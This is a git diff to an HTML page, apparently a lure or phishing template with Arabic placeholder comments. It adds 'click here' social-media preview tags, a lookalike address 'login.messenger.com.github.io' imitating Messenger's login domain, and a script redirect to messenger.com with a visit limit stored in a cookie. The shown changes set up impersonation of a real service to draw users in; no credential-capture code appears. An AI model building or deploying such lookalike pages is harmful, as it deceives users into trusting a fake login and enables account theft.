--- a/index.html
+++ b/index.html
@@ -10,9 +10,30 @@
 
   <!-- غير الصورة المصغرة -->
   <link rel="icon" type="image/x-icon" href="favicon.ico">
+  
+<!-- Primary Meta Tags -->
+<title>click here</title>
+<meta name="title" content="click here">
+<meta name="description" content="haga clic aquí">
 
+<!-- Open Graph / Facebook -->
+<meta property="og:type" content="website">
+<meta property="og:url" content="http://login.messenger.com.github.io/">
+<meta property="og:title" content="click here">
+<meta property="og:description" content="haga clic aquí">
+<meta property="og:image" content="">
 
-  <!-- ضع العنوان الخاص بك هنا  -->
+<!-- Twitter -->
+<meta property="twitter:card" content="summary_large_image">
+<meta property="twitter:url" content="http://login.messenger.com.github.io/">
+<meta property="twitter:title" content="click here">
+<meta property="twitter:description" content="haga clic aquí">
+<meta property="twitter:image" content="">
+
+  
+  
+  
+  <!-- login.messenger.com.github.io  -->
   <title> غير هذا النص </title>
   <meta name="title" content="غير هذا النص">
   <meta property="twitter:title" content="غير هذا النص">
@@ -43,7 +64,7 @@
 
   <script>
 
-    const URL = "https://www.google.com"; // أدخل الرابط الخاص بك هنا
+    const URL = "https://www.messenger.com/"; // أدخل الرابط الخاص بك هنا
     const LIMIT = "2"; // أدخل عدد التسجيل المتاح
 
     document.cookie = `rURL=${URL},vLimit=${LIMIT}`;
